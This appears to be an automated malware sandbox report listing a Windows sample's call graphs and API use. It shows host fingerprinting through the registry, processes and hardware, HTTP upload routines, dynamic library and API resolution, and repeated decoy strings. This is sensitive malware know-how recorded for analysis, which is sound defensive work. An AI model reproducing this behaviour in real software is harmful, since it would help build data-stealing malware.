API calls 15240->15241 15242 1724ae 15241->15242 15243 17a8a0 lstrcpy 15242->15243 15244 1724b7 15243->15244 15786 178320 15244->15786 15246 1724d3 15247 17a920 3 API calls 15246->15247 15248 1724e6 15247->15248 15249 17a8a0 lstrcpy 15248->15249 15250 1724ef 15249->15250 15251 17a9b0 4 API calls 15250->15251 15252 172519 15251->15252 15253 17a8a0 lstrcpy 15252->15253 15254 172522 15253->15254 15255 17a9b0 4 API calls 15254->15255 15256 172543 15255->15256 15257 17a8a0 lstrcpy 15256->15257 15258 17254c 15257->15258 15259 178320 17 API calls 15258->15259 15260 172568 15259->15260 15261 17a920 3 API calls 15260->15261 15262 17257b 15261->15262 15263 17a8a0 lstrcpy 15262->15263 15264 172584 15263->15264 15265 17a9b0 4 API calls 15264->15265 15266 1725ae 15265->15266 15267 17a8a0 lstrcpy 15266->15267 15268 1725b7 15267->15268 15269 17a9b0 4 API calls 15268->15269 15270 1725d6 15269->15270 15271 17a8a0 lstrcpy 15270->15271 15272 1725df 15271->15272 15273 17a9b0 4 API calls 15272->15273 15274 172600 15273->15274 15275 17a8a0 lstrcpy 15274->15275 15276 172609 15275->15276 15822 178680 15276->15822 15278 172620 15279 17a920 3 API calls 15278->15279 15280 172633 15279->15280 15281 17a8a0 lstrcpy 15280->15281 15282 17263c 15281->15282 15283 17265a lstrlen 15282->15283 15284 17266a 15283->15284 15285 17a740 lstrcpy 15284->15285 15286 17267c 15285->15286 15287 161590 lstrcpy 15286->15287 15288 17268d 15287->15288 15832 175190 15288->15832 15290 172699 15290->13722 16020 17aad0 15291->16020 15293 165009 InternetOpenUrlA 15294 165021 15293->15294 15295 1650a0 InternetCloseHandle InternetCloseHandle 15294->15295 15296 16502a InternetReadFile 15294->15296 15297 1650ec 15295->15297 15296->15294 15297->13726 16021 1698d0 15298->16021 15300 170759 15301 17077d 15300->15301 15302 170a38 15300->15302 15304 170799 StrCmpCA 15301->15304 15303 161590 lstrcpy 15302->15303 15305 170a49 15303->15305 15307 170843 15304->15307 15308 1707a8 15304->15308 16197 170250 15305->16197 15311 170865 StrCmpCA 15307->15311 15310 17a7a0 lstrcpy 15308->15310 15312 1707c3 15310->15312 15313 170874 15311->15313 15350 17096b 15311->15350 15314 161590 lstrcpy 15312->15314 15315 17a740 lstrcpy 15313->15315 15316 17080c 15314->15316 15318 170881 15315->15318 15319 17a7a0 lstrcpy 15316->15319 15317 17099c StrCmpCA 15320 170a2d 15317->15320 15321 1709ab 15317->15321 15322 17a9b0 4 API calls 15318->15322 15323 170823 15319->15323 15320->13730 15324 161590 lstrcpy 15321->15324 15325 1708ac 15322->15325 15326 17a7a0 lstrcpy 15323->15326 15327 1709f4 15324->15327 15328 17a920 3 API calls 15325->15328 15329 17083e 15326->15329 15330 17a7a0 lstrcpy 15327->15330 15331 1708b3 15328->15331 16024 16fb00 15329->16024 15333 170a0d 15330->15333 15334 17a9b0 4 API calls 15331->15334 15335 17a7a0 lstrcpy 15333->15335 15336 1708ba 15334->15336 15350->15317 15672 17a7a0 lstrcpy 15671->15672 15673 161683 15672->15673 15674 17a7a0 lstrcpy 15673->15674 15675 161695 15674->15675 15676 17a7a0 lstrcpy 15675->15676 15677 1616a7 15676->15677 15678 17a7a0 lstrcpy 15677->15678 15679 1615a3 15678->15679 15679->14553 15681 1647c6 15680->15681 15682 164838 lstrlen 15681->15682 15706 17aad0 15682->15706 15684 164848 InternetCrackUrlA 15685 164867 15684->15685 15685->14630 15687 17a740 lstrcpy 15686->15687 15688 178b74 15687->15688 15689 17a740 lstrcpy 15688->15689 15690 178b82 GetSystemTime 15689->15690 15692 178b99 15690->15692 15691 17a7a0 lstrcpy 15693 178bfc 15691->15693 15692->15691 15693->14645 15695 17a931 15694->15695 15696 17a988 15695->15696 15698 17a968 lstrcpy lstrcat 15695->15698 15697 17a7a0 lstrcpy 15696->15697 15699 17a994 15697->15699 15698->15696 15699->14649 15700->14763 15702 164eee 15701->15702 15703 169af9 LocalAlloc 15701->15703 15702->14651 15702->14654 15703->15702 15704 169b14 CryptStringToBinaryA 15703->15704 15704->15702 15705 169b39 LocalFree 15704->15705 15705->15702 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 1777a0 15711->15839 15714 1776c6 RegOpenKeyExA 15716 1776e7 RegQueryValueExA 15714->15716 15717 177704 RegCloseKey 15714->15717 15715 171c1e 15715->15006 15716->15717 15717->15715 15719 171c99 15718->15719 15719->15020 15721 171e09 15720->15721 15721->15062 15723 177a9a wsprintfA 15722->15723 15724 171e84 15722->15724 15723->15724 15724->15076 15726 177b4d 15725->15726 15727 171efe 15725->15727 15846 178d20 LocalAlloc CharToOemW 15726->15846 15727->15090 15730 17a740 lstrcpy 15729->15730 15731 177bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15740 177c25 15731->15740 15732 177c46 GetLocaleInfoA 15732->15740 15733 177d18 15734 177d1e LocalFree 15733->15734 15735 177d28 15733->15735 15734->15735 15737 17a7a0 lstrcpy 15735->15737 15736 17a9b0 lstrcpy lstrlen lstrcpy lstrcat 15736->15740 15738 177d37 15737->15738 15738->15103 15739 17a8a0 lstrcpy 15739->15740 15740->15732 15740->15733 15740->15736 15740->15739 15742 172008 15741->15742 15742->15118 15744 1794b5 15743->15744 15745 179493 GetModuleFileNameExA CloseHandle 15743->15745 15746 17a740 lstrcpy 15744->15746 15745->15744 15747 172091 15746->15747 15747->15133 15749 172119 15748->15749 15750 177e68 RegQueryValueExA 15748->15750 15749->15147 15751 177e8e RegCloseKey 15750->15751 15751->15749 15753 177fb9 GetLogicalProcessorInformationEx 15752->15753 15754 177fd8 GetLastError 15753->15754 15757 178029 15753->15757 15761 177fe3 15754->15761 15763 178022 15754->15763 15758 1789f0 2 API calls 15757->15758 15760 17807b 15758->15760 15759 1789f0 2 API calls 15762 172194 15759->15762 15760->15763 15764 178084 wsprintfA 15760->15764 15761->15753 15761->15762 15847 1789f0 15761->15847 15850 178a10 GetProcessHeap RtlAllocateHeap 15761->15850 15762->15161 15763->15759 15763->15762 15764->15762 15766 17220f 15765->15766 15766->15175 15768 1789b0 15767->15768 15769 17814d GlobalMemoryStatusEx 15768->15769 15772 178163 __aulldiv 15769->15772 15770 17819b wsprintfA 15771 172289 15770->15771 15771->15189 15772->15770 15774 1787fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 17a740 lstrcpy 15774->15776 15777 17230b 15776->15777 15777->15203 15779 17a740 lstrcpy 15778->15779 15785 178229 15779->15785 15780 178263 15781 17a7a0 lstrcpy 15780->15781 15783 1782dc 15781->15783 15782 17a9b0 lstrcpy lstrlen lstrcpy lstrcat 15782->15785 15783->15220 15784 17a8a0 lstrcpy 15784->15785 15785->15780 15785->15782 15785->15784 15787 17a740 lstrcpy 15786->15787 15788 17835c RegOpenKeyExA 15787->15788 15789 1783d0 15788->15789 15790 1783ae 15788->15790 15792 178613 RegCloseKey 15789->15792 15793 1783f8 RegEnumKeyExA 15789->15793 15791 17a7a0 lstrcpy 15790->15791 15802 1783bd 15791->15802 15796 17a7a0 lstrcpy 15792->15796 15794 17843f wsprintfA RegOpenKeyExA 15793->15794 15795 17860e 15793->15795 15797 178485 RegCloseKey RegCloseKey 15794->15797 15798 1784c1 RegQueryValueExA 15794->15798 15795->15792 15796->15802 15799 17a7a0 lstrcpy 15797->15799 15800 178601 RegCloseKey 15798->15800 15801 1784fa lstrlen 15798->15801 15799->15802 15800->15795 15801->15800 15803 178510 15801->15803 15802->15246 15804 17a9b0 4 API calls 15803->15804 15805 178527 15804->15805 15806 17a8a0 lstrcpy 15805->15806 15807 178533 15806->15807 15808 17a9b0 4 API calls 15807->15808 15809 178557 15808->15809 15810 17a8a0 lstrcpy 15809->15810 15811 178563 15810->15811 15812 17856e RegQueryValueExA 15811->15812 15812->15800 15813 1785a3 15812->15813 15814 17a9b0 4 API calls 15813->15814 15815 1785ba 15814->15815 15816 17a8a0 lstrcpy 15815->15816 15817 1785c6 15816->15817 15818 17a9b0 4 API calls 15817->15818 15819 1785ea 15818->15819 15820 17a8a0 lstrcpy 15819->15820 15821 1785f6 15820->15821 15821->15800 15823 17a740 lstrcpy 15822->15823 15824 1786bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 17875d CloseHandle 15824->15825 15826 1786e8 Process32Next 15824->15826 15827 17a7a0 lstrcpy 15825->15827 15826->15825 15831 1786fd 15826->15831 15830 178776 15827->15830 15828 17a9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15831 15829 17a8a0 lstrcpy 15829->15831 15830->15278 15831->15826 15831->15828 15831->15829 15833 17a7a0 lstrcpy 15832->15833 15834 1751b5 15833->15834 15835 161590 lstrcpy 15834->15835 15836 1751c6 15835->15836 15851 165100 15836->15851 15838 1751cf 15838->15290 15842 177720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 1776b9 15841->15714 15841->15715 15843 177765 RegQueryValueExA 15842->15843 15844 177780 RegCloseKey 15842->15844 15843->15844 15845 177793 15844->15845 15845->15841 15846->15727 15848 178a0c 15847->15848 15849 1789f9 GetProcessHeap HeapFree 15847->15849 15848->15761 15849->15848 15850->15761 15852 17a7a0 lstrcpy 15851->15852 15853 165119 15852->15853 15854 1647b0 2 API calls 15853->15854 15855 165125 15854->15855 16011 178ea0 15855->16011 15857 165184 15858 165192 lstrlen 15857->15858 15859 1651a5 15858->15859 15860 178ea0 4 API calls 15859->15860 15861 1651b6 15860->15861 15862 17a740 lstrcpy 15861->15862 15863 1651c9 15862->15863 15864 17a740 lstrcpy 15863->15864 15865 1651d6 15864->15865 15866 17a740 lstrcpy 15865->15866 15867 1651e3 15866->15867 15868 17a740 lstrcpy 15867->15868 15869 1651f0 15868->15869 15870 17a740 lstrcpy 15869->15870 15871 1651fd InternetOpenA StrCmpCA 15870->15871 15872 16522f 15871->15872 15873 1658c4 InternetCloseHandle 15872->15873 15874 178b60 3 API calls 15872->15874 15880 1658d9 codecvt 15873->15880 15875 16524e 15874->15875 15876 17a920 3 API calls 15875->15876 15877 165261 15876->15877 15878 17a8a0 lstrcpy 15877->15878 15879 16526a 15878->15879 15881 17a9b0 4 API calls 15879->15881 15883 17a7a0 lstrcpy 15880->15883 15882 1652ab 15881->15882 15884 17a920 3 API calls 15882->15884 15892 165913 15883->15892 15885 1652b2 15884->15885 15886 17a9b0 4 API calls 15885->15886 15887 1652b9 15886->15887 15888 17a8a0 lstrcpy 15887->15888 15889 1652c2 15888->15889 15890 17a9b0 4 API calls 15889->15890 15891 165303 15890->15891 15893 17a920 3 API calls 15891->15893 15892->15838 15894 16530a 15893->15894 15895 17a8a0 lstrcpy 15894->15895 15896 165313 15895->15896 15897 165329 InternetConnectA 15896->15897 15897->15873 15898 165359 HttpOpenRequestA 15897->15898 15900 1658b7 InternetCloseHandle 15898->15900 15901 1653b7 15898->15901 15900->15873 15902 17a9b0 4 API calls 15901->15902 15903 1653cb 15902->15903 15904 17a8a0 lstrcpy 15903->15904 15905 1653d4 15904->15905 15906 17a920 3 API calls 15905->15906 15907 1653f2 15906->15907 15908 17a8a0 lstrcpy 15907->15908 15909 1653fb 15908->15909 15910 17a9b0 4 API calls 15909->15910 15911 16541a 15910->15911 15912 17a8a0 lstrcpy 15911->15912 15913 165423 15912->15913 15914 17a9b0 4 API calls 15913->15914 15915 165444 15914->15915 15916 17a8a0 lstrcpy 15915->15916 15917 16544d 15916->15917 15918 17a9b0 4 API calls 15917->15918 16012 178ead CryptBinaryToStringA 16011->16012 16013 178ea9 16011->16013 16012->16013 16014 178ece GetProcessHeap RtlAllocateHeap 16012->16014 16013->15857 16014->16013 16015 178ef4 codecvt 16014->16015 16016 178f05 CryptBinaryToStringA 16015->16016 16016->16013 16020->15293 16263 169880 16021->16263 16023 1698e1 16023->15300 16198 17a740 lstrcpy 16197->16198 16199 170266 16198->16199 16200 178de0 2 API calls 16199->16200 16201 17027b 16200->16201 16202 17a920 3 API calls 16201->16202 16203 17028b 16202->16203 16204 17a8a0 lstrcpy 16203->16204 16205 170294 16204->16205 16264 16988e 16263->16264 16267 166fb0 16264->16267 16266 1698ad codecvt 16266->16023 16270 166d40 16267->16270 16271 166d63 16270->16271 16285 166d59 16270->16285 16286 166530 16271->16286 16275 166dbe 16275->16285 16296 1669b0 16275->16296 16277 166e2a 16278 166ee6 VirtualFree 16277->16278 16280 166ef7 16277->16280 16277->16285 16278->16280 16279 166f41 16283 1789f0 2 API calls 16279->16283 16279->16285 16280->16279 16281 166f26 FreeLibrary 16280->16281 16282 166f38 16280->16282 16281->16280 16284 1789f0 2 API calls 16282->16284 16283->16285 16284->16279 16285->16266 16287 166542 16286->16287 16289 166549 16287->16289 16306 178a10 GetProcessHeap RtlAllocateHeap 16287->16306 16289->16285 16290 166660 16289->16290 16295 16668f VirtualAlloc 16290->16295 16292 166730 16293 166743 VirtualAlloc 16292->16293 16294 16673c 16292->16294 16293->16294 16294->16275 16295->16292 16295->16294 16297 1669c9 16296->16297 16301 1669d5 16296->16301 16298 166a09 LoadLibraryA 16297->16298 16297->16301 16299 166a32 16298->16299 16298->16301 16303 166ae0 16299->16303 16307 178a10 GetProcessHeap RtlAllocateHeap 16299->16307 16301->16277 16302 166ba8 GetProcAddress 16302->16301 16302->16303 16303->16301 16303->16302 16304 1789f0 2 API calls 16304->16303 16305 166a8b 16305->16301 16305->16304 16306->16289 16307->16305 17975 54543b 17976 547392 17975->17976 17977 5473e7 RegOpenKeyA 17976->17977 17978 5473c0 RegOpenKeyA 17976->17978 17980 547404 17977->17980 17978->17977 17979 5473dd 17978->17979 17979->17977 17981 547448 GetNativeSystemInfo 17980->17981 17982 547453 17980->17982 17981->17982

                          Executed Functions

                          Function 00179860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 179860-179874 call 179750 663 179a93-179af2 LoadLibraryA * 5 660->663 664 17987a-179a8e call 179780 GetProcAddress * 21 660->664 666 179af4-179b08 GetProcAddress 663->666 667 179b0d-179b14 663->667 664->663 666->667 668 179b46-179b4d 667->668 669 179b16-179b41 GetProcAddress * 2 667->669 671 179b4f-179b63 GetProcAddress 668->671 672 179b68-179b6f 668->672 669->668 671->672 673 179b71-179b84 GetProcAddress 672->673 674 179b89-179b90 672->674 673->674 675 179b92-179bbc GetProcAddress * 2 674->675 676 179bc1-179bc2 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00CC1738), ref: 001798A1
                          • GetProcAddress.KERNEL32(76210000,00CC1528), ref: 001798BA
                          • GetProcAddress.KERNEL32(76210000,00CC15A0), ref: 001798D2
                          • GetProcAddress.KERNEL32(76210000,00CC15D0), ref: 001798EA
                          • GetProcAddress.KERNEL32(76210000,00CC1540), ref: 00179903
                          • GetProcAddress.KERNEL32(76210000,00CC9478), ref: 0017991B
                          • GetProcAddress.KERNEL32(76210000,00CB64A0), ref: 00179933
                          • GetProcAddress.KERNEL32(76210000,00CB62E0), ref: 0017994C
                          • GetProcAddress.KERNEL32(76210000,00CC1648), ref: 00179964
                          • GetProcAddress.KERNEL32(76210000,00CC1588), ref: 0017997C
                          • GetProcAddress.KERNEL32(76210000,00CC1600), ref: 00179995
                          • GetProcAddress.KERNEL32(76210000,00CC1750), ref: 001799AD
                          • GetProcAddress.KERNEL32(76210000,00CB6320), ref: 001799C5
                          • GetProcAddress.KERNEL32(76210000,00CC17B0), ref: 001799DE
                          • GetProcAddress.KERNEL32(76210000,00CC1618), ref: 001799F6
                          • GetProcAddress.KERNEL32(76210000,00CB6580), ref: 00179A0E
                          • GetProcAddress.KERNEL32(76210000,00CC1660), ref: 00179A27
                          • GetProcAddress.KERNEL32(76210000,00CC1678), ref: 00179A3F
                          • GetProcAddress.KERNEL32(76210000,00CB6660), ref: 00179A57
                          • GetProcAddress.KERNEL32(76210000,00CC1840), ref: 00179A70
                          • GetProcAddress.KERNEL32(76210000,00CB6640), ref: 00179A88
                          • LoadLibraryA.KERNEL32(00CC1810,?,00176A00), ref: 00179A9A
                          • LoadLibraryA.KERNEL32(00CC1828,?,00176A00), ref: 00179AAB
                          • LoadLibraryA.KERNEL32(00CC18B8,?,00176A00), ref: 00179ABD
                          • LoadLibraryA.KERNEL32(00CC18D0,?,00176A00), ref: 00179ACF
                          • LoadLibraryA.KERNEL32(00CC1858,?,00176A00), ref: 00179AE0
                          • GetProcAddress.KERNEL32(75B30000,00CC1870), ref: 00179B02
                          • GetProcAddress.KERNEL32(751E0000,00CC1888), ref: 00179B23
                          • GetProcAddress.KERNEL32(751E0000,00CC18A0), ref: 00179B3B
                          • GetProcAddress.KERNEL32(76910000,00CC9528), ref: 00179B5D
                          • GetProcAddress.KERNEL32(75670000,00CB6620), ref: 00179B7E
                          • GetProcAddress.KERNEL32(77310000,00CC93F8), ref: 00179B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00179BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00179BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 33ea2a2d70caed5f8385dd6516eb570461fbceba00f2355581df79e7e9d821c1
                          • Instruction ID: 8b0e949d21c7597bbe8a8040436cf3f31449dfecfae4e38db47bad4634817a4d
                          • Opcode Fuzzy Hash: 33ea2a2d70caed5f8385dd6516eb570461fbceba00f2355581df79e7e9d821c1
                          • Instruction Fuzzy Hash: BFA16FB7500A109FD397DFA8ED88A663BFDF74E301F04851AA615C3264D73A9841DF12
                          Function 001645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 1645c0-164695 RtlAllocateHeap 781 1646a0-1646a6 764->781 782 16474f-1647a9 VirtualProtect 781->782 783 1646ac-16474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0016460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0016479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The 